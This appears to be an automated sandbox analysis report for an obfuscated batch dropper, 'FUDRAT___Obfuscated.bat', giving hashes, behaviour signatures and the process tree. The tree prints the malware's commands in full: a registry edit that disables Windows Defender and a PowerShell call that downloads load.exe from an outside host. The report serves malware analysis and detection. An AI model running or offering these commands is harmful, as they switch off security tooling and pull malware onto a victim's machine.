Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    24-12-2024 17:26

General

  • Target

    FUDRAT___Obfuscated.bat

  • Size

    463B

  • MD5

    a9fdda2577ff67660be21d0d4cd98179

  • SHA1

    15432871fed4cbb19ec26eaabcc6b193beebbbfb

  • SHA256

    8f18705cf5653667888ea5f2440e984d22c5207e7e5e2fccb68e7ad71f58bb83

  • SHA512

    0f43e8b47bdd9d1a2ce65db49868f7698b83bcb5f8d249a29078793e5ca48d75bf8ce99dae00f772c28b766ac761040c0113d9034e7e7d35efb75b39eca5153d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://whatsabool.online/kingvonpiracyvirus/load.exe

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\FUDRAT___Obfuscated.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2264
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
        PID:2376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://whatsabool.online/kingvonpiracyvirus/load.exe', 'C:\Users\Admin\AppData\Local\Temp\load.exe')"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2692

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2692-4-0x000007FEF6B5E000-0x000007FEF6B5F000-memory.dmp

      Filesize

      4KB

    • memory/2692-5-0x000000001B770000-0x000000001BA52000-memory.dmp

      Filesize

      2.9MB

    • memory/2692-6-0x00000000021D0000-0x00000000021D8000-memory.dmp

      Filesize

      32KB

    • memory/2692-7-0x000007FEF68A0000-0x000007FEF723D000-memory.dmp

      Filesize

      9.6MB

    • memory/2692-8-0x000007FEF68A0000-0x000007FEF723D000-memory.dmp

      Filesize

      9.6MB

    • memory/2692-9-0x000007FEF68A0000-0x000007FEF723D000-memory.dmp

      Filesize

      9.6MB

    • memory/2692-10-0x000007FEF68A0000-0x000007FEF723D000-memory.dmp

      Filesize

      9.6MB

    • memory/2692-11-0x000007FEF68A0000-0x000007FEF723D000-memory.dmp

      Filesize

      9.6MB